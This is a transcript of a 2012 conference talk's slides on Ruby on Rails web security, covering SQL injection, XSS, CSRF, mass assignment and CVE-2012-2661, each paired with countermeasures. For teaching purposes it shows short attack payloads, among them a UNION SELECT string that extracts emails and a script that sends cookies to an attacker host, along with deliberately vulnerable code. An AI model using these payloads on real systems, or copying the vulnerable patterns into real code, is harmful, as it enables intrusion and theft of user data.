web application security in rails
Post on 15-May-2015
1.122 Views
Preview:
DESCRIPTION
TRANSCRIPT
WEB APPLICATION SECURITY IN RAILS
Uri Nativ RailsIsrael 2012
Uri Nativ @unativ
Head of Engineering
Klarna Tel Aviv
#railsisrael
Buy Now, Pay Later
1. Shop online 2. Receive your goods 3. Pay
Alice
Bob
Alice and Bob
Alice and Bob
Alice and Bob
Like Duh?
Alice and Bob
<html> <title> MicroBlogging </title> ...
#$@# %#@&*#$
Alice and Bob
Hack it!
SQL INJECTION
@results = Micropost.where( "content LIKE '%#{params[:query]%’”).all
SELECT 'microposts'.*
FROM 'microposts’ WHERE (content LIKE ’%SEARCHSTRING%’)
SQL Injection
SELECT 'microposts'.* FROM 'microposts' WHERE (content LIKE '%SEARCHSTRING%')
SQL Injection
XXX') UNION SELECT 1, email, 1, 1, 1 FROM users --
SELECT 'microposts'.* FROM 'microposts' WHERE (content LIKE '%XXX') UNION SELECT 1, email, 1, 1, 1 FROM users -- %')
SQL Injection
SELECT 'microposts'.* FROM 'microposts' WHERE (content LIKE '%XXX') UNION SELECT 1, email, 1, 1, 1 FROM users -- %')
SQL Injection
@results = Micropost.where( "content LIKE ?’, "%#{params[:query]}%”) ).all
SQL Injection - countermeasures
CROSS SITE SCRIPTING
XSS
<span class="content"> <%= raw feed_item.content %>
</span>
XSS
<script> document.write('<img src= "http://www.attacker.com/x.png?' + document.cookie + ’” >'); </script>
XSS
<span class="content"> <%= sanitize feed_item.content,
:tags => ['a’] %>
</span>
XSS - countermeasures
The Attack: Execute arbitrary code / defacement JSON is not escaped by default CSS can be injected as well
Countermeasures:
Never trust data from the users Use Markdown (e.g. Redcarpet gem)
XSS
CROSS SITE REQUEST FORGERY
CSRF
www.blog.com
CSRF
1
www.blog.com
2
Click here for free iPad
www.freeiPad.com <form name=“evilform”
action=“www.blog.com/….”> …
<script> document.evilform.submit()
</script>
CSRF
www.blog.com
www.freeiPad.com <form name=“evilform”
action=“www.blog.com/….”> …
<script> document.evilform.submit()
</script>
CSRF
3
www.blog.com
www.freeiPad.com <form name=“evilform”
action=“www.blog.com/….”> …
<script> document.evilform.submit()
</script>
POST /blogpost Content=“Kick Me!”
CSRF
4
<input name ="authenticity_token” type ="hidden” value ="vyFdEgofzU4oSJJn5wypxq4“
/>
CSRF – Authenticity Token
routes.rb match '/delete_post/:id',
to: 'microposts#destroy'
CSRF
class ApplicationController < ActionController::Base
# commented to easily test forms # protect_from_forgery ... end
CSRF
The Attack: Attacker send requests on the victim’s behalf Doesn’t depend on XSS Attacked doesn’t need to be logged-in
Countermeasures:
Use Rails CSRF default protection (do not override it) Use GET for queries Use POST/DELETE/… when updating data Add Sign-out link
CSRF
RAILS SPECIFIC ATTACKS
MASS ASSIGNMENT
boo[gotcha!]
def create @user = User.new(params[:user]) ... end
Mass Assignment
def create @user = User.new(params[:user]) ... end
Mass Assignment
{ :name => “gotcha”, :admin => true }
Blacklist class User < ActiveRecord::Base attr_protected :admin ... end
Mass Assignment - countermeasures
Whitelist class User < ActiveRecord::Base attr_accessible :name, :email, :password, :password_confirmation ...
Mass Assignment - countermeasures
Global Config (whitelist) config.active_record.
whitelist_attributes = true
Mass Assignment - countermeasures
The Attack: Unprotected by default :(
Countermeasures:
Whitelist Blacklist Strong Parameters (whitelist) Rails 4 Logic moved to the controller Available as a Gem
Mass Assignment
SQL INJECTION VULNERABILITY IN RUBY ON RAILS (CVE-2012-2661)
User.where( :id => params[:user_id], :reset_token => params[:token]
) SELECT users.* FROM users WHERE users.id = 6 AND users.reset_token = ’XYZ' LIMIT 1
CVE-2012-2661 SQL Injection
/users/6/password/edit?token[] SELECT users.* FROM users WHERE users.id = 6 AND users.reset_token IS NULL LIMIT 1
CVE-2012-2661 SQL Injection
The Attack: SQL Injection - Affected version: Rails < 3.2.4
Countermeasures:
Upgrade to Rails 3.2.4 or higher
CVE-2012-2661 SQL Injection
------------------------------------------------- | Warning Type | Total | ------------------------------------------------- | Cross Site Scripting | 2 | | Cross-Site Request Forgery | 1 | | Denial of Service | 1 | | Redirect | 1 | | SQL Injection | 4 | -------------------------------------------------
Brakeman
CONCLUSIONS
Make Love not War
Know the threats – OWASP top 10 Follow Rails conventions Ruby on Rails Security Guide
http://guides.rubyonrails.org/security.html
The Ruby on Rails security project
http://www.rorsecurity.info
Rails security mailing list:
http://groups.google.com/group/rubyonrails-security
Conclusions
Daniel Amselem for pair programming Irit Shainzinger for the cool graphics Michael Hartl for his microblogging app tutorial
Thanks to…
Pay Online – Safer and Simpler
https://github.com/unativ/sample_app
top related